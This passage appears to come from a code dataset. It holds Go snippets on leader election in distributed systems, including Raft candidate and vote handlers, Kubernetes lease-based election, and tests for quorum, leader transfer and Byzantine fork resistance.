time.NewTicker(10 * time.Millisecond)\n\tdefer ticker.Stop()\n\n\t// This loops wakes every 10ms and checks if the conditions are conducive\n\t// for starting an election. This is not the most efficient and\n\t// theoretically we could just wake up every electionTimeout, but this\n\t// reduces testability/log readability.\n\tfor {\n\t\t<-ticker.C\n\n\t\tnode.mu.Lock()\n\t\tif node.state != candidate && node.state != follower {\n\t\t\tlog.Printf(\"The node is in the %s state, no need to run election\", node.state)\n\t\t\tnode.mu.Unlock()\n\t\t\treturn\n\t\t}\n\n\t\t// If the timer was started in a previous term then we can back off\n\t\t// because a newer go routine would have been spawned cooresponding to\n\t\t// the new term.\n\t\tif node.currentTerm != timerStartTerm {\n\t\t\tlog.Printf(\"Election timer started in term %d but now node has latest term %d, so we can back off\", timerStartTerm, node.currentTerm)\n\t\t\treturn\n\t\t}\n\n\t\t// Run an election if we have reached the election timeout.\n\t\tif timePassed := time.Since(node.timeSinceTillLastReset); timePassed > electionTimeout {\n\t\t\tnode.runElection()\n\t\t\tnode.mu.Unlock()\n\t\t\treturn\n\t\t}\n\n\t\tnode.mu.Unlock()\n\t}\n}", "func (le *LeaderElector) initElection() {\n\thighestRank := false\n\t//Poll servers with higher rank\n\tfor SID, serv := range le.ThisServer.GroupInfoPtr.GroupMembers {\n\t\tif SID < le.ThisServer.SID {\n\t\t\t//Has Higher rank, SID 0 > SID 1 > SID 2 ....\n\t\t\tok := call(serv, \"LeaderElector.ChangeLeader\", new(interface{}), &highestRank)\n\t\t\tif ok && highestRank == true {\n\t\t\t\t//Theres a server with higher rank, let go\n\t\t\t\tdebug(\"[*] Info : LeaderElector : There is Another Server - %s- With Higher Rank.Backing off. \", serv)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n\t//No server with higher rank, become leader\n\tle.becomeLeader()\n}", "func TestLeaderTransferReceiveHigherTermVote(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(3)\n\n\tlead := nt.peers[1].(*raft)\n\n\t// Transfer leadership to isolated node to let transfer pending.\n\tnt.send(pb.Message{From: 3, To: 1, Type: pb.MsgTransferLeader})\n\tif lead.leadTransferee != 3 {\n\t\tt.Fatalf(\"wait transferring, leadTransferee = %v, want %v\", lead.leadTransferee, 3)\n\t}\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup, Index: 1, Term: 2})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n}", "func TestElection_HasVoted(t *testing.T) {\n\ttestDatabase := database.StormDB{\n\t\tFile: \"election_testdb.db\",\n\t}\n\terr := testDatabase.Connect()\n\tif err != nil {\n\t\tt.Errorf(\"Couldn't connect to database. Error: %s\", err.Error())\n\t}\n\ttestVoter := models.Voter{\n\t\tStudentID: 1,\n\t\tCohort: 1,\n\t\tName: \"Prof Sturman\",\n\t}\n\ttestVoterWontVote := models.Voter{\n\t\tStudentID: 2,\n\t\tCohort: 1,\n\t\tName: \"Prof Goldschmidt\",\n\t}\n\ttestCandidate := models.Candidate{\n\t\tID: 1,\n\t\tCohort: 1,\n\t\tName: \"Joey Lyon\",\n\t}\n\n\terr = testDatabase.StoreVoter(testVoter)\n\tif err != nil {\n\t\tt.Errorf(\"Couldn't add test voter to database\")\n\t}\n\terr = testDatabase.StoreVoter(testVoterWontVote)\n\tif err != nil {\n\t\tt.Errorf(\"Couldn't add test voter to database\")\n\t}\n\terr = testDatabase.StoreCandidate(testCandidate)\n\tif err != nil {\n\t\tt.Errorf(\"Couldn't add test candidate to database\")\n\t}\n\n\te := New(&testDatabase, false, []string{})\n\t// Begin testing HasVoted function\n\tret, err := e.HasVoted(testVoter)\n\tif err != nil {\n\t\tt.Errorf(\"unexpected error in checking if voter has voted\")\n\t}\n\tif *ret {\n\t\tt.Errorf(\"HasVoted returned true when a voter hasn't voted\")\n\t}\n\n\tvote := &models.Vote{\n\t\tCandidate: 1,\n\t\tStudentID: 1,\n\t}\n\tvote.HashVote(&testVoter)\n\te.CastVotes(&testVoter, []models.Vote{*vote})\n\tret, err = e.HasVoted(testVoter)\n\tif err != nil {\n\t\tt.Errorf(\"unexpected error in checking if voter has voted\")\n\t}\n\tif *ret == false {\n\t\tt.Errorf(\"HasVoted returned false when a voter has voted\")\n\t}\n\n\tret, err = e.HasVoted(testVoterWontVote)\n\tif err != nil {\n\t\tt.Errorf(\"unexpected error in checking if voter has voted\")\n\t}\n\tif *ret {\n\t\tt.Errorf(\"HasVoted returned true when a voter has not voted\")\n\t}\n\terr = os.Remove(\"election_testdb.db\")\n\tif err != nil {\n\t\tt.Log(\"Cleanup failed\")\n\t}\n}", "func TestLeaderFailure(t *testing.T){\r\n\tif !TESTLEADERFAILURE{\r\n\t\treturn\r\n\t}\r\n rafts,_ := makeRafts(5, \"input_spec.json\", \"log\", 200, 300)\t\r\n\ttime.Sleep(2*time.Second)\t\t\t\r\n\trunning := make(map[int]bool)\r\n\tfor i:=1;i<=5;i++{\r\n\t\trunning[i] = true\r\n\t}\r\n\trafts[0].smLock.RLock()\r\n\tlid := rafts[0].LeaderId()\r\n\trafts[0].smLock.RUnlock()\r\n\tdebugRaftTest(fmt.Sprintf(\"leader Id:%v\\n\", lid))\r\n\tif lid != -1{\r\n\t\trafts[lid-1].Shutdown()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"Leader(id:%v) is down, now\\n\", lid))\r\n\t\ttime.Sleep(4*time.Second)\t\t\t\r\n\t\trunning[lid] = false\r\n\t\tfor i := 1; i<= 5;i++{\r\n\t\t\tif running[i] {\r\n\t\t\t\trafts[i-1].Append([]byte(\"first\"))\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\ttime.Sleep(5*time.Second)\t\t\t\r\n\r\n\tfor idx, node := range rafts {\r\n\t\tnode.smLock.RLock()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"%v\", node.sm.String()))\r\n\t\tnode.smLock.RUnlock()\r\n\t\tif running[idx-1]{\r\n\t\t\tnode.Shutdown()\r\n\t\t}\r\n\t}\r\n}", "func TestAddNodeCheckQuorum(t *testing.T) {\n\tr := newTestRaft(1, []uint64{1}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tr.pendingConf = true\n\tr.checkQuorum = true\n\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\n\tfor i := 0; i < r.electionTimeout-1; i++ {\n\t\tr.tick()\n\t}\n\tgrp := pb.Group{\n\t\tNodeId: 2,\n\t\tGroupId: 1,\n\t\tRaftReplicaId: 2,\n\t}\n\tr.addNode(2, grp)\n\n\t// This tick will reach electionTimeout, which triggers a quorum check.\n\tr.tick()\n\n\t// Node 1 should still be the leader after a single tick.\n\tif r.state != StateLeader {\n\t\tt.Errorf(\"state = %v, want %v\", r.state, StateLeader)\n\t}\n\n\t// After another electionTimeout ticks without hearing from node 2,\n\t// node 1 should step down.\n\tfor i := 0; i < r.electionTimeout; i++ {\n\t\tr.tick()\n\t}\n\n\tif r.state != StateFollower {\n\t\tt.Errorf(\"state = %v, want %v\", r.state, StateFollower)\n\t}\n}", "func TestNoQuorum(t *testing.T) {\n\tcommitteeMock, keys := agreement.MockCommittee(3, true, 3)\n\teb, roundChan := initAgreement(committeeMock)\n\thash, _ := crypto.RandEntropy(32)\n\teb.Publish(string(topics.Agreement), agreement.MockAgreement(hash, 1, 1, keys))\n\teb.Publish(string(topics.Agreement), agreement.MockAgreement(hash, 1, 1, keys))\n\n\tselect {\n\tcase <-roundChan:\n\t\tassert.FailNow(t, \"not supposed to get a round update without reaching quorum\")\n\tcase <-time.After(100 * time.Millisecond):\n\t\t// all good\n\t}\n}", "func (r *Node) doCandidate() stateFunction {\n\tr.Out(\"Transitioning to CandidateState\")\n\tr.State = CandidateState\n\n\t// Foollowing &5.2\n\t// Increment currentTerm\n\tr.setCurrentTerm(r.GetCurrentTerm() + 1)\n\t// Vote for self\n\tr.setVotedFor(r.Self.GetId())\n\t// Reset election timer\n\ttimeout := randomTimeout(r.config.ElectionTimeout)\n\telectionResults := make(chan bool)\n\tfallbackChan := make(chan bool)\n\tgo r.requestVotes(electionResults, fallbackChan, r.GetCurrentTerm())\n\tfor {\n\t\tselect {\n\t\tcase shutdown := <-r.gracefulExit:\n\t\t\tif shutdown {\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\tcase clientMsg := <-r.clientRequest:\n\t\t\tclientMsg.reply <- rpc.ClientReply{\n\t\t\t\tStatus: rpc.ClientStatus_ELECTION_IN_PROGRESS,\n\t\t\t\tResponse: nil,\n\t\t\t\tLeaderHint: r.Self,\n\t\t\t}\n\n\t\tcase registerMsg := <-r.registerClient:\n\t\t\tregisterMsg.reply <- rpc.RegisterClientReply{\n\t\t\t\tStatus: rpc.ClientStatus_ELECTION_IN_PROGRESS,\n\t\t\t\tClientId: 0,\n\t\t\t\tLeaderHint: r.Self,\n\t\t\t}\n\n\t\tcase voteMsg := <-r.requestVote:\n\t\t\tif r.handleCompetingRequestVote(voteMsg) {\n\t\t\t\treturn r.doFollower\n\t\t\t}\n\n\t\tcase appendMsg := <-r.appendEntries:\n\t\t\t_, toFollower := r.handleAppendEntries(appendMsg)\n\t\t\tif toFollower {\n\t\t\t\treturn r.doFollower\n\t\t\t}\n\n\t\tcase elected := <-electionResults:\n\t\t\tif elected {\n\t\t\t\treturn r.doLeader\n\t\t\t}\n\n\t\tcase toFollower := <-fallbackChan:\n\t\t\tif toFollower {\n\t\t\t\treturn r.doFollower\n\t\t\t}\n\n\t\tcase <-timeout:\n\t\t\treturn r.doCandidate\n\t\t}\n\t}\n}", "func (r *Raft) candidate() int {\n\t//myId := r.Myconfig.Id\n\t//fmt.Println(\"Election started!I am\", myId)\n\n\t//reset the votes else it will reflect the votes received in last term\n\tr.resetVotes()\n\n\t//--start election timer for election-time out time, so when responses stop coming it must restart the election\n\n\twaitTime := 10\n\t//fmt.Println(\"ELection timeout is\", waitTime)\n\tElectionTimer := r.StartTimer(ElectionTimeout, waitTime)\n\t//This loop is for election process which keeps on going until a leader is elected\n\tfor {\n\t\tr.currentTerm = r.currentTerm + 1 //increment current term\n\t\t//fmt.Println(\"I am candidate\", r.Myconfig.Id, \"and current term is now:\", r.currentTerm)\n\n\t\tr.votedFor = r.Myconfig.Id //vote for self\n\t\tr.WriteCVToDisk() //write Current term and votedFor to disk\n\t\tr.f_specific[r.Myconfig.Id].vote = true\n\n\t\t//fmt.Println(\"before calling prepRV\")\n\t\treqVoteObj := r.prepRequestVote() //prepare request vote obj\n\t\t//fmt.Println(\"after calling prepRV\")\n\t\tr.sendToAll(reqVoteObj) //send requests for vote to all servers\n\t\t//this loop for reading responses from all servers\n\t\tfor {\n\t\t\treq := r.receive()\n\t\t\tswitch req.(type) {\n\t\t\tcase RequestVoteResponse: //got the vote response\n\t\t\t\tresponse := req.(RequestVoteResponse) //explicit typecasting so that fields of struct can be used\n\t\t\t\t//fmt.Println(\"Got the vote\", response.voteGranted)\n\t\t\t\tif response.voteGranted {\n\t\t\t\t\t//\t\t\t\t\ttemp := r.f_specific[response.id] //NOT ABLE TO DO THIS--WHY??--WORK THIS WAY\n\t\t\t\t\t//\t\t\t\t\ttemp.vote = true\n\n\t\t\t\t\tr.f_specific[response.id].vote = true\n\t\t\t\t\t//r.voteCount = r.voteCount + 1\n\t\t\t\t}\n\t\t\t\tvoteCount := r.countVotes()\n\t\t\t\t//fmt.Println(\"I am:\", r.Myconfig.Id, \"Votecount is\", voteCount)\n\t\t\t\tif voteCount >= majority {\n\t\t\t\t\t//fmt.Println(\"Votecount is majority, I am new leader\", r.Myconfig.Id)\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\tr.LeaderConfig.Id = r.Myconfig.Id //update leader details\n\t\t\t\t\treturn leader //become the leader\n\t\t\t\t}\n\n\t\t\tcase AppendEntriesReq: //received an AE request instead of votes, i.e. some other leader has been elected\n\t\t\t\trequest := req.(AppendEntriesReq)\n\t\t\t\t//Can be clubbed with serviceAppendEntriesReq with few additions!--SEE LATER\n\n\t\t\t\t//fmt.Println(\"I am \", r.Myconfig.Id, \"candidate,got AE_Req from\", request.leaderId, \"terms my,leader are\", r.currentTerm, request.term)\n\t\t\t\twaitTime_secs := secs * time.Duration(waitTime)\n\t\t\t\tappEntriesResponse := AppendEntriesResponse{}\n\t\t\t\tappEntriesResponse.followerId = r.Myconfig.Id\n\t\t\t\tappEntriesResponse.success = false //false by default, in case of heartbeat or invalid leader\n\t\t\t\tif request.term >= r.currentTerm { //valid leader\n\t\t\t\t\tr.LeaderConfig.Id = request.leaderId //update leader info\n\t\t\t\t\tElectionTimer.Reset(waitTime_secs) //reset the timer\n\t\t\t\t\tvar myLastIndexTerm int\n\t\t\t\t\tif len(r.myLog) == 0 {\n\t\t\t\t\t\tmyLastIndexTerm = -1\n\n\t\t\t\t\t} else {\n\t\t\t\t\t\tmyLastIndexTerm = r.myLog[r.myMetaData.lastLogIndex].Term\n\t\t\t\t\t}\n\t\t\t\t\tif request.leaderLastLogIndex == r.myMetaData.lastLogIndex && request.term == myLastIndexTerm { //this is heartbeat from a valid leader\n\t\t\t\t\t\tappEntriesResponse.success = true\n\t\t\t\t\t}\n\t\t\t\t\tsend(request.leaderId, appEntriesResponse)\n\t\t\t\t\treturn follower\n\t\t\t\t} else {\n\t\t\t\t\t//check if log is same\n\t\t\t\t\t//fmt.Println(\"In candidate, AE_Req-else\")\n\t\t\t\t\tsend(request.leaderId, appEntriesResponse)\n\t\t\t\t}\n\t\t\tcase int:\n\t\t\t\twaitTime_secs := secs * time.Duration(waitTime)\n\t\t\t\tElectionTimer.Reset(waitTime_secs)\n\t\t\t\tbreak //come out of inner loop i.e. restart the election process\n\t\t\t\t//default: if something else comes, then ideally it should ignore that and again wait for correct type of response on channel\n\t\t\t\t//it does this, in the present code structure\n\t\t\t}\n\t\t}\n\t}\n}", "func (o *Operator) runLeaderElection(lockName, label string, onStart func(stop <-chan struct{}), readyProbe *probe.ReadyProbe) {\n\tnamespace := o.Config.Namespace\n\tkubecli := o.Dependencies.Client.Kubernetes()\n\tlog := o.log.Str(\"lock-name\", lockName)\n\teventTarget := o.getLeaderElectionEventTarget(log)\n\trecordEvent := func(reason, message string) {\n\t\tif eventTarget != nil {\n\t\t\to.Dependencies.EventRecorder.Event(eventTarget, core.EventTypeNormal, reason, message)\n\t\t}\n\t}\n\n\tlock := &resourcelock.LeaseLock{\n\t\tLeaseMeta: meta.ObjectMeta{\n\t\t\tName: lockName,\n\t\t\tNamespace: namespace,\n\t\t},\n\t\tClient: kubecli.CoordinationV1(),\n\t\tLockConfig: resourcelock.ResourceLockConfig{\n\t\t\tIdentity: o.Config.ID,\n\t\t\tEventRecorder: o.Dependencies.EventRecorder,\n\t\t},\n\t}\n\n\tctx := context.Background()\n\tleaderelection.RunOrDie(ctx, leaderelection.LeaderElectionConfig{\n\t\tLock: lock,\n\t\tLeaseDuration: 15 * time.Second,\n\t\tRenewDeadline: 10 * time.Second,\n\t\tRetryPeriod: 2 * time.Second,\n\t\tCallbacks: leaderelection.LeaderCallbacks{\n\t\t\tOnStartedLeading: func(ctx context.Context) {\n\t\t\t\trecordEvent(\"Leader Election Won\", fmt.Sprintf(\"Pod %s is running as leader\", o.Config.PodName))\n\t\t\t\treadyProbe.SetReady()\n\t\t\t\tif err := o.setRoleLabel(log, label, constants.LabelRoleLeader); err != nil {\n\t\t\t\t\tlog.Error(\"Cannot set leader role on Pod. Terminating process\")\n\t\t\t\t\tos.Exit(2)\n\t\t\t\t}\n\t\t\t\tonStart(ctx.Done())\n\t\t\t},\n\t\t\tOnStoppedLeading: func() {\n\t\t\t\trecordEvent(\"Stop Leading\", fmt.Sprintf(\"Pod %s is stopping to run as leader\", o.Config.PodName))\n\t\t\t\tlog.Info(\"Stop leading. Terminating process\")\n\t\t\t\tos.Exit(1)\n\t\t\t},\n\t\t\tOnNewLeader: func(identity string) {\n\t\t\t\tlog.Str(\"identity\", identity).Info(\"New leader detected\")\n\t\t\t\treadyProbe.SetReady()\n\t\t\t},\n\t\t},\n\t})\n}", "func TestLearnerPromotion(t *testing.T) {\n\tn1 := newTestLearnerRaft(1, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\n\tnt := newNetwork(n1, n2)\n\n\tif n1.state == StateLeader {\n\t\tt.Error(\"peer 1 state is leader, want not\", n1.state)\n\t}\n\n\t// n1 should become leader\n\tsetRandomizedElectionTimeout(n1, n1.electionTimeout)\n\tfor i := 0; i < n1.electionTimeout; i++ {\n\t\tn1.tick()\n\t}\n\n\tif n1.state != StateLeader {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", n1.state, StateLeader)\n\t}\n\tif n2.state != StateFollower {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", n2.state, StateFollower)\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgBeat})\n\tgrp2 := pb.Group{\n\t\tNodeId: 2,\n\t\tGroupId: 1,\n\t\tRaftReplicaId: 2,\n\t}\n\tn1.addNode(2, grp2)\n\tn2.addNode(2, grp2)\n\tif n2.isLearner {\n\t\tt.Error(\"peer 2 is learner, want not\")\n\t}\n\n\t// n2 start election, should become leader\n\tsetRandomizedElectionTimeout(n2, n2.electionTimeout)\n\tfor i := 0; i < n2.electionTimeout; i++ {\n\t\tn2.tick()\n\t}\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgBeat})\n\n\tif n1.state != StateFollower {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", n1.state, StateFollower)\n\t}\n\tif n2.state != StateLeader {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", n2.state, StateLeader)\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\n\t//defer rf.updateAppliedLock()\n\t//Your code here (2A, 2B).\n\tisALeader := rf.role == Leader\n\n\tif rf.updateTermLock(args.Term) && isALeader {\n\t\t//DPrintf(\"[DEBUG] Server %d from %d to Follower {requestVote : Term higher}\", rf.me, Leader)\n\t}\n\treply.VoteCranted = false\n\tvar votedFor interface{}\n\t//var isLeader bool\n\tvar candidateID, currentTerm, candidateTerm, currentLastLogIndex, candidateLastLogIndex, currentLastLogTerm, candidateLastLogTerm int\n\n\tcandidateID = args.CandidateID\n\tcandidateTerm = args.Term\n\tcandidateLastLogIndex = args.LastLogIndex\n\tcandidateLastLogTerm = args.LastLogTerm\n\n\trf.mu.Lock()\n\n\treply.Term = rf.currentTerm\n\tcurrentTerm = rf.currentTerm\n\tcurrentLastLogIndex = len(rf.logs) - 1 //TODO: fix the length corner case\n\tcurrentLastLogTerm = rf.logs[len(rf.logs)-1].Term\n\tvotedFor = rf.votedFor\n\tisFollower := rf.role == Follower\n\trf.mu.Unlock()\n\t//case 0 => I'm leader, so you must stop election\n\tif !isFollower {\n\t\tDPrintf(\"[DEBUG] Case0 I [%d] is Candidate than %d\", rf.me, args.CandidateID)\n\t\treturn\n\t}\n\n\t//case 1 => the candidate is not suit to be voted\n\tif currentTerm > candidateTerm {\n\t\tDPrintf(\"[DEBUG] Case1 Follower %d > Candidate %d \", rf.me, args.CandidateID)\n\t\treturn\n\t}\n\n\t//case 2 => the candidate's log is not lastest than the follwer\n\tif currentLastLogTerm > candidateLastLogTerm || (currentLastLogTerm == candidateLastLogTerm && currentLastLogIndex > candidateLastLogIndex) {\n\t\tDPrintf(\"[DEBUG] Case2 don't my[%d] newer than can[%d]\", rf.me, args.CandidateID)\n\t\treturn\n\t}\n\trf.mu.Lock()\n\t//case3 => I have voted and is not you\n\tif votedFor != nil && votedFor != candidateID {\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\n\t//now I will vote you\n\n\tvar notFollower bool\n\trf.votedFor = candidateID\n\tif rf.role != Follower {\n\t\tnotFollower = true\n\t}\n\tDPrintf(\"[Vote] Server[%d] vote to Can[%d]\", rf.me, args.CandidateID)\n\trf.role = Follower\n\treply.VoteCranted = true\n\trf.mu.Unlock()\n\trf.persist()\n\tif notFollower {\n\t\trf.msgChan <- RecivedVoteRequest\n\t} else {\n\t\trf.msgChan <- RecivedVoteRequest\n\t}\n\n\treturn\n}", "func legacyLeaderElectionStart(id, name string, leased *plug.Leased, lock rl.Interface, ttl time.Duration) func() {\n\treturn func() {\n\t\tglog.V(2).Infof(\"Verifying no controller manager is running for %s\", id)\n\t\twait.PollInfinite(ttl/2, func() (bool, error) {\n\t\t\t_, err := lock.Get()\n\t\t\tif err == nil {\n\t\t\t\treturn false, nil\n\t\t\t}\n\t\t\tif kapierrors.IsNotFound(err) {\n\t\t\t\treturn true, nil\n\t\t\t}\n\t\t\tutilruntime.HandleError(fmt.Errorf(\"unable to confirm %s lease exists: %v\", name, err))\n\t\t\treturn false, nil\n\t\t})\n\t\tglog.V(2).Infof(\"Attempting to acquire controller lease as %s, renewing every %s\", id, ttl)\n\t\tgo leased.Run()\n\t\tgo wait.PollInfinite(ttl/2, func() (bool, error) {\n\t\t\t_, err := lock.Get()\n\t\t\tif err == nil {\n\t\t\t\tglog.V(2).Infof(\"%s lease has been taken, %s is exiting\", name, id)\n\t\t\t\tleased.Stop(nil)\n\t\t\t\treturn true, nil\n\t\t\t}\n\t\t\t// NotFound indicates the endpoint is missing and the etcd lease should continue to be held\n\t\t\tif !kapierrors.IsNotFound(err) {\n\t\t\t\tutilruntime.HandleError(fmt.Errorf(\"unable to confirm %s lease exists: %v\", name, err))\n\t\t\t}\n\t\t\treturn false, nil\n\t\t})\n\t}\n}", "func TestThatAByzantineLeaderCanNotCauseAForkBySendingTwoBlocks(t *testing.T) {\n\ttest.WithContextWithTimeout(t, 15*time.Second, func(ctx context.Context) {\n\t\tblock1 := mocks.ABlock(interfaces.GenesisBlock)\n\t\tnet := network.\n\t\t\tNewTestNetworkBuilder().\n\t\t\tWithNodeCount(4).\n\t\t\tWithTimeBasedElectionTrigger(1000 * time.Millisecond).\n\t\t\tWithBlocks(block1).\n\t\t\tBuild(ctx)\n\n\t\tnode0 := net.Nodes[0]\n\t\tnode1 := net.Nodes[1]\n\t\tnode2 := net.Nodes[2]\n\n\t\tnode0.Communication.SetOutgoingWhitelist([]primitives.MemberId{\n\t\t\tnode1.MemberId,\n\t\t\tnode2.MemberId,\n\t\t})\n\n\t\t// the leader (node0) is suggesting block1 to node1 and node2 (not to node3)\n\t\tnet.StartConsensus(ctx)\n\n\t\t// node0, node1 and node2 should reach consensus\n\t\tnet.WaitUntilNodesEventuallyCommitASpecificBlock(ctx, t, 0, block1, node0, node1, node2)\n\t})\n}", "func (a *RPC) VoteForLeader(args *VoteInfo,reply *bool) error{\n\t\n\tse := r.GetServer(r.id)\n\tif ( (args.ElectionTerm >= r.currentTerm) && (args.LastCommit >= se.LsnToCommit) && (args.ElectionTerm != r.votedTerm) && se.isLeader==2){\n\t\tr.votedTerm=args.ElectionTerm\n\t\t*reply = true\n\t} else {\n\t\t*reply = false\n\t}\nreturn nil\n}", "func TestVoter_Vote(t *testing.T) {\n\tallia := sdk.NewOntologySdk()\n\tallia.NewRpcClient().SetAddress(RpcAddr)\n\tvoting := make(chan *btc.BtcProof, 10)\n\n\tacct, err := GetAccountByPassword(allia, \"../cmd/lightcli/wallet.dat\", \"passwordtest\")\n\tif err != nil {\n\t\tt.Fatalf(\"Failed to get acct: %v\", err)\n\t}\n\n\tconf := spvwallet.NewDefaultConfig()\n\tconf.RepoPath = \"./\"\n\tconf.Params = &chaincfg.TestNet3Params\n\tsqliteDatastore, err := db.Create(conf.RepoPath)\n\tif err != nil {\n\t\tt.Fatalf(\"failed to create sqlite db: %v\", err)\n\t}\n\tconf.DB = sqliteDatastore\n\twallet, _ := spvwallet.NewSPVWallet(conf)\n\tredeem, _ := hex.DecodeString(\"5521023ac710e73e1410718530b2686ce47f12fa3c470a9eb6085976b70b01c64c9f732102c9dc4d8f419e325bbef0fe039ed6feaf2079a2ef7b27336ddb79be2ea6e334bf2102eac939f2f0873894d8bf0ef2f8bbdd32e4290cbf9632b59dee743529c0af9e802103378b4a3854c88cca8bfed2558e9875a144521df4a75ab37a206049ccef12be692103495a81957ce65e3359c114e6c2fe9f97568be491e3f24d6fa66cc542e360cd662102d43e29299971e802160a92cfcd4037e8ae83fb8f6af138684bebdc5686f3b9db21031e415c04cbc9b81fbee6e04d8c902e8f61109a2c9883a959ba528c52698c055a57ae\")\n\n\twallet.Start()\n\tdefer func() {\n\t\twallet.Close()\n\t\tos.RemoveAll(\"./peers.json\")\n\t\tos.RemoveAll(\"./waiting.bin\")\n\t\tos.RemoveAll(\"./headers.bin\")\n\t\tos.RemoveAll(\"./wallet.db\")\n\t}()\n\n\tquit := make(chan struct{})\n\tv, err := NewVoter(allia, voting, wallet, redeem, acct, 0, 20000, \"\", 6, quit)\n\tif err != nil {\n\t\tt.Fatalf(\"failed to new voter: %v\", err)\n\t}\n\n\tgo v.Vote()\n\tgo v.WaitingRetry()\n\n\tsink := common.NewZeroCopySink(nil)\n\tBp1.Serialization(sink)\n\n\tgo func() {\n\t\tfor {\n\t\t\tvoting <- Bp1\n\t\t\ttime.Sleep(2 * time.Second)\n\t\t}\n\t}()\n\n\ttime.Sleep(time.Second * 10)\n}", "func runElectionTimeoutThread(\n\ttimeSinceLastUpdate * time.Time,\n\tisElection * bool,\n\tstate * ServerState,\n\tvoteChannels *[8]chan Vote,\n\tonWinChannel * chan bool,\n\telectionThreadSleepTime time.Duration,\n) {\n\tfor {\n\t\ttimeElapsed := time.Now().Sub(*timeSinceLastUpdate)\n\t\tif timeElapsed.Milliseconds() > ElectionTimeOut { //implements C4.\n\t\t\t*isElection = true // restarts election\n\t\t}\n\n\t\tif *isElection {\n\t\t\t*timeSinceLastUpdate = time.Now()\n\t\t\tgo elect(state, voteChannels, *onWinChannel)\n\t\t}\n\n\t\ttime.Sleep(electionThreadSleepTime)\n\t}\n}", "func (rf *Raft) startElectionTimer() {\n\tfor {\n\t\tif rf.killed() {\n\t\t\treturn\n\t\t}\n\t\trf.mu.Lock()\n\t\telectionTimeout := rf.electionTimeout\n\t\tlastHeard := rf.lastHeard\n\t\trf.mu.Unlock()\n\t\tnow := time.Now()\n\t\tif now.After(lastHeard.Add(electionTimeout)) {\n\t\t\tgo rf.candidate()\n\t\t\treturn\n\t\t}\n\t\ttime.Sleep(10 * time.Millisecond)\n\t}\n}", "func (s *ConsensusServiceImpl) RunLeaderElection(request *RunLeaderElectionRequestPB) (*RunLeaderElectionResponsePB, error) {\n\ts.Log.V(1).Info(\"sending RPC request\", \"service\", \"yb.consensus.ConsensusService\", \"method\", \"RunLeaderElection\", \"request\", request)\n\tresponse := &RunLeaderElectionResponsePB{}\n\n\terr := s.Messenger.SendMessage(\"yb.consensus.ConsensusService\", \"RunLeaderElection\", request.ProtoReflect().Interface(), response.ProtoReflect().Interface())\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\ts.Log.V(1).Info(\"received RPC response\", \"service\", \"yb.consensus.ConsensusService\", \"method\", \"RunLeaderElection\", \"response\", response)\n\n\treturn response, nil\n}", "func NewElection(url string, desc string, frozenAt string, name string,\n\topenreg bool, questions []*Question, shortName string,\n\tuseVoterAliases bool, votersHash string, votingEnd string,\n\tvotingStart string, k *Key) (*Election, *big.Int, error) {\n\tuuid, err := GenUUID()\n\tif err != nil {\n\t\t// glog.Error(\"Couldn't generate an election UUID\")\n\t\treturn nil, nil, err\n\t}\n\n\t// var pk *Key\n\t// var secret *big.Int\n\t// if k == nil {\n\t// \tif pk, secret, err = NewKey(); err != nil {\n\t// \t\t// glog.Error(\"Couldn't generate a new key for the election\")\n\t// \t\treturn nil, nil, err\n\t// \t}\n\t// } else {\n\t// \t// Take the public params from k to generate the key.\n\t// \tif pk, secret, err = NewKeyFromParams(k.Generator, k.Prime, k.ExponentPrime); err != nil {\n\t// \t\t// glog.Error(\"Couldn't generate a new key for the election\")\n\t// \t\treturn nil, nil, err\n\t// \t}\n\t// }\n\n\te := &Election{\n\t\tCastURL: url,\n\t\tDescription: desc,\n\t\tFrozenAt: frozenAt,\n\t\tName: name,\n\t\tOpenreg: openreg,\n\t\tPublicKey: nil,\n\t\tQuestions: questions,\n\t\tShortName: shortName,\n\t\tUseVoterAliases: useVoterAliases,\n\t\tUuid: uuid,\n\t\tVotersHash: votersHash,\n\t\tVotingEndsAt: votingEnd,\n\t\tVotingStartsAt: votingStart,\n\t}\n\n\t// Compute the JSON of the election and compute its hash\n\t//json, err := MarshalJSON(e)\n\t//if err != nil {\n\t//\tglog.Error(\"Couldn't marshal the election as JSON\")\n\t//\treturn nil, nil, err\n\t//}\n\t//\n\t//h := sha256.Sum256(json)\n\t//encodedHash := base64.StdEncoding.EncodeToString(h[:])\n\t//e.ElectionHash = encodedHash[:len(encodedHash)-1]\n\t//e.JSON = json\n\treturn e, nil, nil\n\t// return e, secret, nil\n}", "func Test_releaseLock_Update(t *testing.T) {\n\ttests := []struct {\n\t\tname string\n\t\tf func(t *testing.T, internalClient *kubefake.Clientset, isLeader *isLeaderTracker, cancel context.CancelFunc)\n\t}{\n\t\t{\n\t\t\tname: \"renewal fails on update\",\n\t\t\tf: func(t *testing.T, internalClient *kubefake.Clientset, isLeader *isLeaderTracker, cancel context.CancelFunc) {\n\t\t\t\tinternalClient.PrependReactor(\"update\", \"*\", func(action kubetesting.Action) (handled bool, ret 